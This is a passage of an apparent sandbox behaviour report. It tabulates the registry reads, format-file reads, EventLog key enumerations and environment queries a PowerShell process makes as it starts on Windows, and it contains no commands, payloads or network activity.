| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 4096 |
|
17 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 3022 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 50, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 4096 |
|
6 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 281 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\FileSystem.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 4096 |
|
62 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 3895 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 201, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Help.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 4096 |
|
21 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 3687 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 409, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellCore.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 4096 |
|
4 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 2228 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 844, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\PowerShellTrace.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| File | Create | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_type |
|
2 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 4096 |
|
4 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 3736 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 360, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Windows\System32\WindowsPowerShell\v1.0\Registry.format.ps1xml, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
7 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Enumerate Values | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN, value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Get Key Info | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Enumerate Keys | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = HOMEDRIVE, result_out = C: |
|
1 | |
| Environment | Get Environment String | name = HOMEPATH, result_out = \Users\BGC6u8Oy yXGxkR |
|
1 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\, type = file_attributes |
|
4 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
5 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\Desktop, type = file_attributes |
|
2 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
1 | |
| File | Get Info | filename = C:\, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\Desktop, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Users\BGC6u8Oy yXGxkR\Desktop, type = file_attributes |
|
3 | |
| Environment | Get Environment String | name = MshEnableTrace |
|
2 | |
